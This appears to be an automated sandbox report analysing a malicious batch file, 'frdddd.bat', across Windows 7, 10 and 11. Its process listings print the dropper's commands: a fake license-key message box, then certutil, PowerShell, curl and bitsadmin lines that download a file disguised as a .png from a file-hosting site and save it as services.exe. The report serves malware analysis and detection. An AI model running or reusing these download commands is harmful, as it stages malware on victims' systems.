Analysis Overview
SHA256
6cbc3c8e40db05db5086c922bfdfc09eba597d00feb4de442ccc210c11adfdcd
Threat Level: Likely malicious
The file frdddd.bat was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-26 17:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-26 17:39
Reported
2024-07-26 17:51
Platform
win7-20240708-en
Max time kernel
680s
Max time network
691s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
Files
memory/2692-4-0x000007FEF460E000-0x000007FEF460F000-memory.dmp
memory/2692-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2692-6-0x0000000001F80000-0x0000000001F88000-memory.dmp
memory/2692-7-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-9-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-8-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-10-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-11-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
memory/2692-12-0x000007FEF4350000-0x000007FEF4CED000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 33699b0d456ab857c654d32bb2e3d0dd |
| SHA1 | 41f8ea34091911ce5bd3bb1ae0001b2b7757afe3 |
| SHA256 | 856a97eb624bc867818df6621476301d7e5fee700d75ad3d1c60e0e22335c567 |
| SHA512 | a443e18f62712d18fa6733382888036ea3440cfcf016827d869421ec5c87dc592de2f4d36d875815c47c4b68b3815a6abc5be5621a70c4c87ddf3cef2a90410d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SUKDE7OPGAIDYLA7PF3Z.temp
| MD5 | 2274ec55bb8524294bd4da2157137a42 |
| SHA1 | 7ca9c4c80357eaa63a7fc356051808eff70bb445 |
| SHA256 | db4f6c51f3188a40d7f633f729530873e4aa6191e466a66f174c9fd880a1d1fe |
| SHA512 | a5d5ab9da17495659b99a8131742f7d659344febe5f6ca596ec5c202389c949387923265879ef2e03a1bce9bdd52d749ff7c7cec627f385fbdec929fe41372c8 |
memory/1464-18-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
memory/1464-19-0x0000000002340000-0x0000000002348000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-26 17:39
Reported
2024-07-26 17:48
Platform
win10-20240404-en
Max time kernel
373s
Max time network
398s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5064 wrote to memory of 4164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5064 wrote to memory of 4164 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5064 wrote to memory of 1708 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe |
| PID 5064 wrote to memory of 1708 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe |
| PID 5064 wrote to memory of 976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5064 wrote to memory of 976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5064 wrote to memory of 1720 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe |
| PID 5064 wrote to memory of 1720 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key accepted!', 'Success')"
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
Files
memory/4164-3-0x00007FFA2DF73000-0x00007FFA2DF74000-memory.dmp
memory/4164-5-0x000001867BBB0000-0x000001867BBD2000-memory.dmp
memory/4164-6-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
memory/4164-9-0x000001867BEA0000-0x000001867BF16000-memory.dmp
memory/4164-10-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lxc0pd4w.ekv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4164-41-0x00007FFA2DF70000-0x00007FFA2E95C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 900713b658f108100bb7aa144134dbca |
| SHA1 | 7a05dd4d5cd03542c5187c8a3036f30b9d79daf0 |
| SHA256 | c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8 |
| SHA512 | 85a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 82bf624e242a520bea827e1597a3b6c3 |
| SHA1 | 44b39896a849a7a8e959be51b63b260d2a5c2703 |
| SHA256 | 8b57b809a4849de8c8341d0d1fcfddf0cb39c81f28a081fe95b0f0aa48ad89fa |
| SHA512 | df229348ee2496d9456235ba0aef84431e66be0ec0a5baa7afa5bb7255d527ae632a8fa7c603e3b2bb137f2175728fe678dc745fc885b49dbf1178615476a774 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-26 17:39
Reported
2024-07-26 17:47
Platform
win10v2004-20240709-en
Max time kernel
439s
Max time network
443s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 40.58.20.217.in-addr.arpa | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
memory/2616-0-0x00007FF9109F3000-0x00007FF9109F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqc3mlmu.fba.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2616-10-0x000001594BB20000-0x000001594BB42000-memory.dmp
memory/2616-11-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp
memory/2616-12-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp
memory/2616-15-0x000001594B7D0000-0x000001594B9EC000-memory.dmp
memory/2616-16-0x00007FF9109F0000-0x00007FF9114B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 614f88cf39eb3223246afec4bf1463b4 |
| SHA1 | 74d738ee6fdada75ac1ef1645073005e3f6b6cfb |
| SHA256 | 021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd |
| SHA512 | 84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 545200acaf2c8f78ae532a89dc92847f |
| SHA1 | ed204ca3305153883b4a6452d3a51ba5a6d145e1 |
| SHA256 | 70df64fb0f6dd58a197b24edda7d79e43d9f5326dab3559e210ca48f89fef2f2 |
| SHA512 | e0eb48db79189689d56b2a845d416b78e4d2dd9f931423f8cfc28ed4d2f032e7b0f192f17e294eddb259f85de99ff8debdc5ef8f86843c50fc8134ee02b178e1 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-26 17:39
Reported
2024-07-26 17:42
Platform
win11-20240709-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Key failed!', 'Error')"
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Invoke-WebRequest -Uri 'https://files.catbox.moe/83dtmm.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\services.exe'"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Local\Temp\services.exe" "https://files.catbox.moe/83dtmm.png"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority high "https://files.catbox.moe/83dtmm.png" "C:\Users\Admin\AppData\Local\Temp\services.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| N/A | 127.0.0.1:49827 | tcp | |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 108.181.20.37:443 | files.catbox.moe | tcp |
Files
memory/2012-0-0x00007FF82AFF3000-0x00007FF82AFF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xgowykvb.lxy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2012-9-0x0000029D7C1C0000-0x0000029D7C1E2000-memory.dmp
memory/2012-10-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-11-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-12-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
memory/2012-15-0x00007FF82AFF0000-0x00007FF82BAB2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f33a85941bcb1090d75289d34035310 |
| SHA1 | b24a3c2248b575a78c066866768c6a7fb9f8e06c |
| SHA256 | 169bb5671a611478cb7dc58e7d1b01a5ce2d354591c4a63e7b191b6e7b6dee6c |
| SHA512 | d6065d75737f4016d876cb4ada85b196b1be70e06b552ebae0d51f7b84a01e87151ae81ba3aa584bfe28ce4df69f62e6a37d3918d2b3b02a7b3ebfb3bf7540b5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 962574549d8b04e5eeda54c5284808d0 |
| SHA1 | d37b5af76b44a47e4ce09ea3a3421408a901b7eb |
| SHA256 | 063fe32bc457964b5f53515b749bac5b7012469ce0d0b0fd5ece65206b283060 |
| SHA512 | 7354c6d53d1bc28ad9d027def0e2335a7fab5e02473bf056687dcfc0e3e7b2ad0b3314772747e9b2753d1314ee84ffa220e3e7e310c519d4adede2bba5f1aff6 |